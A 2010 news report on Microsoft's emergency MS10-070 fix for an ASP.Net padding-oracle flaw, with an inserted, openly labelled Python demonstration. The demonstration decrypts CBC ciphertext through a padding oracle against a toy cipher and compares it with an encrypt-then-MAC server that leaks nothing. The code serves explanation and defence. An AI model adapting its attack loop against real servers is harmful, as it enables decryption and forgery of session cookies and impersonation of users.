Microsoft issues emergency security patch for Windows
October 1, 2010
Wednesday, Microsoft delivered an emergency security fix for an ASP.Net flaw that is already being exploited in limited attacks.
The patch addresses a padding oracle vulnerability in the way ASP.Net encrypts and decrypts data: by submitting modified ciphertext and watching how the server responds to it, an attacker can decrypt session cookies, view state and other data the server encrypted, and forge such data to log in to a Web application as another user, including an administrative one.
The same hole can also be used to retrieve files from a Web application on the server, such as its configuration file.
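The mechanism Rizzo and Duong exploited is a padding oracle: the server's response to a tampered ciphertext differed depending on whether the decrypted bytes ended in valid padding, and that one bit per query is enough to decrypt any ciphertext the server produced, one byte at a time, without the key. The following is an added example, not Microsoft's code and not the researchers' tool. It uses a toy Feistel block cipher built from HMAC-SHA256 in place of AES (the attack depends only on CBC chaining and PKCS#7 padding, not on the block cipher), a constructed sample ticket, and assumed key material; it also shows the edge case at the last byte, where a hit may be 0x02 0x02 rather than 0x01, and an encrypt-then-MAC server against which the same attack recovers nothing.

```python
"""Padding-oracle attack on CBC ciphertext, the flaw class behind MS10-070.

Added example, not Microsoft's or the researchers' code. A toy Feistel block
cipher built from HMAC-SHA256 stands in for AES; keys and sample data are made up."""
import hashlib
import hmac

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, i):  # round function: keyed PRF on one 8-byte half
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def toy_encrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _f(key, r, i))
    return l + r

def toy_decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, l, i)), l
    return l + r

def unpad(data):  # PKCS#7; the exception raised here is what the oracle leaks
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    n = BLOCK - len(plaintext) % BLOCK
    padded, out, prev = plaintext + bytes([n]) * n, b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = toy_encrypt_block(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(toy_decrypt_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)

def vulnerable_oracle(key):
    """Server whose response differs on a padding failure: the one-bit leak."""
    def oracle(msg):  # msg = iv || ciphertext
        try:
            return cbc_decrypt(key, msg[:BLOCK], msg[BLOCK:]) is not None
        except ValueError:
            return False
    return oracle

def hardened_oracle(key, mac_key):
    """Encrypt-then-MAC: a forgery fails the tag check before padding is ever
    examined, so every tampered message gets the same answer."""
    def oracle(msg):  # msg = iv || ciphertext || 32-byte HMAC-SHA256 tag
        body, tag = msg[:-32], msg[-32:]
        good = hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest())
        return good and vulnerable_oracle(key)(body)
    return oracle

def recover_block(oracle, prev, block):
    """Recover one plaintext block by forging the block in front of it."""
    inter = bytearray(BLOCK)  # block-cipher output before the CBC xor with prev
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        for guess in range(256):
            forged = bytearray(BLOCK)
            forged[pos] = guess
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padval  # already-known bytes decrypt to padval
            if not oracle(bytes(forged) + block):
                continue
            if pos == BLOCK - 1:
                # Edge case: hit may be 0x02 0x02 (or longer), not 0x01. Disturb
                # the byte to the left; only a genuine 0x01 still passes.
                forged[pos - 1] ^= 0xFF
                if not oracle(bytes(forged) + block):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            return None  # oracle never distinguished padding: nothing leaked
    return xor(bytes(inter), prev)

def padding_oracle_attack(oracle, iv, ct):
    """Decrypt iv||ct using only the oracle; None if the oracle gives nothing away."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    recovered = [recover_block(oracle, blocks[i - 1], blocks[i])
                 for i in range(1, len(blocks))]
    return None if None in recovered else unpad(b"".join(recovered))

# Constructed sample: a forms-auth-style ticket as the "server" would encrypt it.
KEY, MAC_KEY = b"server-enc-key-1", b"server-mac-key-1"  # made-up keys
IV, TICKET = bytes(range(BLOCK)), b"user=alice;role=user"
CT = cbc_encrypt(KEY, IV, TICKET)
```

Running `padding_oracle_attack(vulnerable_oracle(KEY), IV, CT)` returns the ticket after at most 256 queries per byte, with the attacker never holding KEY; against `hardened_oracle` the same call returns None, because the tag check collapses every forgery onto one response. That uniform response is the property Microsoft's workarounds aimed for and the patch restored.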
ASP.Net is Microsoft's Web application framework, used to build websites and Web applications.
Microsoft first publicly acknowledged the flaw on Sept. 17, after two security researchers demonstrated how an attacker could tamper with encrypted session cookies or steal user names and passwords from websites built on the framework.
Three days later, Microsoft warned users that it was seeing limited but active attacks and urged Web server administrators to apply the workarounds spelled out in an updated security advisory.
Wednesday's MS10-070 update patches ASP.Net in all supported versions of Windows, ranging from Windows XP Service Pack 3 (SP3) and Windows Server 2003 to Windows 7 and Windows Server 2008 R2.
Microsoft rated the single security hole "important," the second-highest ranking in its four-step severity system.
"Based on our comprehensive monitoring of the security landscape, we have determined an out-of-band release is needed to protect Microsoft users, as we have seen limited attacks and continued attempts to bypass current defenses and workarounds," Microsoft said.
Microsoft took the unprecedented step of releasing the update only to its download center, where customers must retrieve the patch and install it manually. It won't push the patch to Windows Update until the next "Patch Tuesday," which falls on Oct. 12.
"This is the first time we've released an update in this manner, but due to the nature of the active attacks and the severity of the potential loss of data, we are releasing the security update to the Microsoft Download Center first so customers -- specifically large enterprises, hosting providers and ISVs -- can begin updating their systems," Microsoft said.
Wolfgang Kandek, CTO of Qualys, a California-based security risk and compliance management provider, agreed that getting the security fix out this way was acceptable. End users, he said, are not typically vulnerable to attack since few run a Web server.
"They may have been looking at another week or so of testing," Kandek said, referring to the process Microsoft goes through to make sure that security patches deploy properly via Windows Update. "And with attacks happening, this lets them get it into the hands of administrators who need it now."
Many security experts agreed that it was a smart move on Microsoft's part to be proactive.
"But I don't think it means anything is wrong," said Andrew Storms, director of security operations at nCircle Security. "The affected audience -- large companies, ISPs -- probably don't use Windows Update anyway. They likely have a much more stringent testing protocol."
It's possible that Juliano Rizzo and Thai Duong, the researchers who revealed the flaw Sept. 17 at an Argentinean security conference, had notified Microsoft prior to their presentation, said Kandek. If so, that would have given Microsoft more than the 11 days between the disclosure and the patch to fix the security hole.
Storms, however, thought otherwise. "Based on the fact that there is no name or names crediting the security vulnerability find in the advisory tells me that Microsoft didn't know about it prior to Sept. 17," he said.
Customers who apply Wednesday's security patch don't need to remove the workarounds they have applied at Microsoft's direction, a company spokesman said today. "Once you apply the security update, however, the workarounds are no longer required and can be removed," said Dave Forstrom, the director of communications with the Microsoft Security Response Center.
The rush update, released Sept. 28, is called an "out-of-band" patch because it arrived outside Microsoft's normal monthly patch schedule.